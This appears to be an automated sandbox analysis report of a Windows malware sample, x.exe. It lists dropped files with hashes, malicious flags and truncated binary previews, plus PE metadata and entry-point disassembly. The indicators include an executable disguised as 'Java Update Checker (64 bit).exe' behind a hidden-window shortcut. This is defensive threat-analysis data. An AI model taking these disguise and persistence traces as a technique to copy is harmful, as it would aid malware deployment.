                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):182272
                                      Entropy (8bit):6.778841629892176
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCe7WLuzeHpl18fCtnRPF9EVnb43jaI5gr/uHqZLWfp2KkvL5kdnQB:PueqmCtnRPF9cCGr/uH0gkSdQB
                                      MD5:D307A8D049BC1C09C5C3B972F3609FD3
                                      SHA1:D84D853F3BD3E3DADFE2CB5E4A294B83780A3F3D
                                      SHA-256:C8FB712D11C1F2AE2BC71F58C2D859B0F2F45AA9ED88F6C9F42E89217D03DF48
                                      SHA-512:7D3DE68A9DC7AD364B0E8A37F8A56E556FF774537FDF93AF869BEA4CD14DDD3C0205BD74FBDD66FCDAB5F1FA6E9D5F10F3C8C66D99BF5235109DE51975A2BF7F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8
                                      Entropy (8bit):3.0
                                      Encrypted:false
                                      SSDEEP:3:q7:q7
                                      MD5:81601EB2959385FC7502FE6AF57DA701
                                      SHA1:15622FF1D9E23DE872ED80A80055355AF044D4F9
                                      SHA-256:5FA988F654DC6BC0153ABBCC314A11B24EBF1FB8900AE07F31463B211FECEB65
                                      SHA-512:D6F8841D246073760C0D37DA4B4BDD4A4FF46F6DA3480BC74AB9CD6C844E2FB269721BD54B782B87ECC860A5192059BAE3B9015CEDE333BF391BDCB97BAD9A4D
                                      Malicious:false
                                      Preview:.W....&A
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7547334453049617
                                      Encrypted:false
                                      SSDEEP:96:4dIFdyC98EQkvhkvCCtCGpLvDHRGpLvDHZ:2IFFmCGpL1GpLV
                                      MD5:19EC303860747D7B89A87F6B714D29BF
                                      SHA1:5E92810EF1073EEBC15647DC0017BD4F3CA45EBA
                                      SHA-256:F492A7CB8C59B4054B6DD89A5DA477C71B718912DBED64A2E357D8054858629B
                                      SHA-512:73F8B9D68E875DA0126BE3AAA7EDA4AC969A8822514CA0822C1B9FFE89E026F1700AA7874AD7BEDD6B2BD199C58C8DF953B897F1BDE3629220F0FE89B9DD49CF
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;....s.D.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X............................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.X./...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.X./..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.X./..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.X./....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.X./....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=.X./..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.753421903046966
                                      Encrypted:false
                                      SSDEEP:96:4BIFdyC98EQkvhkvCCtCGpLvDHRGpLvDHZ:OIFFmCGpL1GpLV
                                      MD5:208069C7E84E357F9BB613F474EB2DA5
                                      SHA1:2FE50506755FF2CB751FBC0FFAC30FE6C32F4D24
                                      SHA-256:E563ADFD6636076E6ABCFD833D93F29E5FE0800B4B95CD7AD51241EB37B4B14A
                                      SHA-512:BEF0A0E8E82F85A5BCBD424F6B508C0E6704992AEB38D2342B73AFC2D5C7421067EB53C6EBFC3C11E1657615DFD97399995AF64461342AFD397C2132C2FCCD87
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;...Ee..D.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X............................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.X./...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.X./..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.X./..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.X./....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.X./....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=.X./..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7547069718854624
                                      Encrypted:false
                                      SSDEEP:96:4uIFdyC98EQkvhkvCCtCGpLvDHRGpLvDHZ:tIFFmCGpL1GpLV
                                      MD5:817934726381A30B4B0143F5149A1FFD
                                      SHA1:7D7F4060E000D2846213C359212F3AC08E44F32E
                                      SHA-256:94DFB79406D62BA5B71F5EE5C0334D990D5B8CA7D0BDB774E0DF9431E84CF351
                                      SHA-512:A82B305594454C7A0B9E9AC9C97B90E686D9BE8588E0C4DEC8DFCFC2366ABB269767327D71A7FC08F1CCB346B4095D36F79DC871640A1F186285CD7A54EE93BC
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;....s".D.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X............................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.X./...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.X./..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.X./..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.X./....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.X./....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=.X./..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........
                                      Process:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jul 2 04:56:40 2024, mtime=Tue Jul 2 04:56:40 2024, atime=Tue Jul 2 04:56:40 2024, length=46592, window=hide
                                      Category:dropped
                                      Size (bytes):770
                                      Entropy (8bit):4.618198858120905
                                      Encrypted:false
                                      SSDEEP:12:8ZEEgA0c3SyTke1JPDIjDujAKblgCHGbwjDE0p4pzBmV:8vtky5DIjeAKZ+wjI0p4ptm
                                      MD5:6737E3BA0A7BC2A62CBFFC04C98891A6
                                      SHA1:5D55CB9C2AC6D69E3EFA89C140FDEE85BC43635D
                                      SHA-256:24863C06D9D61489CC22B18F123AA19663673FE1A79D09BB30C66EF18DCD418A
                                      SHA-512:1650F834C8878F94E79E27C5CF18B9BE2A33043C021D4F53EE7258E5B5A37D2F8FBE4651AA12C3A49F7EDD18B7FF78E65D74C90E34FEAD0FFBA8DEB05175EE66
                                      Malicious:false
                                      Preview:L..................F.... ......D.......D.......D................................P.O. .:i.....+00.../C:\...................`.1......Xz&. PROGRA~3..H......O.I.X./....g......................\+.P.r.o.g.r.a.m.D.a.t.a.......2......X./ JAVAUP~1.EXE..r.......X./.X./.............................J.a.v.a. .U.p.d.a.t.e. .C.h.e.c.k.e.r. .(.6.4. .b.i.t.)...e.x.e.......^...............-.......]...........{2.O.....C:\ProgramData\Java Update Checker (64 bit).exe..G.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.J.a.v.a. .U.p.d.a.t.e. .C.h.e.c.k.e.r. .(.6.4. .b.i.t.)...e.x.e.`.......X.......965543...........hT..CrF.f4... ..B.78...,......hT..CrF.f4... ..B.78...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                      Process:C:\Windows\svchost.com
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):59
                                      Entropy (8bit):4.539234152262855
                                      Encrypted:false
                                      SSDEEP:3:oXeqNjMJJLNov:oXe2jInov
                                      MD5:9E06CBAEA528ED37C8D88CB88A27A9FF
                                      SHA1:8C6863473EDBBE39D692EDE22A57D09076BD40E1
                                      SHA-256:FB23916EF2EF95CABF567D35D79DE3209BD357967BBE1AAC618B684D06F4AD36
                                      SHA-512:B9EA6E2EF1E35BE7EE1E2782452FF4419787792299B30CFD7ADF9B37DC6D92D3E6EC36040E6320822E405C7FAFE7F79D05975B8430AF113041D1726A9BF90754
                                      Malicious:true
                                      Preview:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe..
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):41472
                                      Entropy (8bit):6.5046936264369135
                                      Encrypted:false
                                      SSDEEP:768:nyxqjQl/EMQt4Oei7RwsHxKANM0nDhlzOQdJM/:yxqjQ+P04wsZLnDrCn
                                      MD5:E2758E90753E604AB1857653E10B35EE
                                      SHA1:AB11564078B3A7D76FE3AC44F5EBB7A2BA3FF4E9
                                      SHA-256:F3A3B70915119FC44B3D3DFF93B367BE371C28D295A470773AC00266220D713E
                                      SHA-512:B35E860473CEC76FCC823031C2752E30ABD86CAFF433CB704DCC5947C6A5B83BAEA77FDD55485AC09ADADDCC878783444AB87EC734A3C9ACF9E10925E690B18D
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.451047352584057
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.29%
                                      • Win32 Executable (generic) a (10002005/4) 49.25%
                                      • Win32 Executable Borland Delphi 6 (262906/60) 1.29%
                                      • Win32 Executable Delphi generic (14689/80) 0.07%
                                      • Windows Screen Saver (13104/52) 0.06%
                                      File name:x.exe
                                      File size:88'064 bytes
                                      MD5:d27e7c560c09eb318c80cab58baea1b2
                                      SHA1:354342a3b26579d2eb2a0db253ca6505629b3a48
                                      SHA256:6df33c856858c03f62d5a67a7bc69499db91a1405e67b83907dcabfe9bd31d40
                                      SHA512:003ae9783ef7cbca502a907aacf3df63424559a02d9ba4ddde03bd863104970139ef119438f16c6f54a73d81867de1ccace64474e9c4d387dd4694d689815833
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCngEin8r8ItiOeW894Fc9UW68OM3V:zr8WDrCngEus8ItiO094Fc9UUOMF
                                      TLSH:D983AE05B7C08432D1BD0FFD2D239295827AB5332E17DBAF59E84DCA6A6E3C08D08795
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                      Icon Hash:c4f4f2f29090f0e4
                                      Entrypoint:0x408178
                                      Entrypoint Section:CODE
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      DLL Characteristics:
                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:9f4693fc0c511135129493f2161d1e86
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFE0h
                                      xor eax, eax
                                      mov dword ptr [ebp-20h], eax
                                      mov dword ptr [ebp-18h], eax
                                      mov dword ptr [ebp-1Ch], eax
                                      mov dword ptr [ebp-14h], eax
                                      mov eax, 004080E8h
                                      call 00007F5EA4ED91E3h
                                      xor eax, eax
                                      push ebp
                                      push 004082B4h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      mov eax, 004091A8h
                                      mov ecx, 0000000Bh
                                      mov edx, 0000000Bh
                                      call 00007F5EA4EDC37Dh
                                      mov eax, 004091B4h
                                      mov ecx, 00000009h
                                      mov edx, 00000009h
                                      call 00007F5EA4EDC369h
                                      mov eax, 004091C0h
                                      mov ecx, 00000003h
                                      mov edx, 00000003h
                                      call 00007F5EA4EDC355h
                                      mov eax, 004091DCh
                                      mov ecx, 00000003h
                                      mov edx, 00000003h
                                      call 00007F5EA4EDC341h
                                      mov eax, dword ptr [00409210h]
                                      mov ecx, 0000000Bh
                                      mov edx, 0000000Bh
                                      call 00007F5EA4EDC32Dh
                                      call 00007F5EA4EDC384h
                                      lea edx, dword ptr [ebp-14h]
                                      xor eax, eax
                                      call 00007F5EA4ED9C1Eh
                                      mov eax, dword ptr [ebp-14h]
                                      call 00007F5EA4EDA1B2h
                                      cmp eax, 0000A200h
                                      jle 00007F5EA4EDD467h
                                      call 00007F5EA4EDC902h
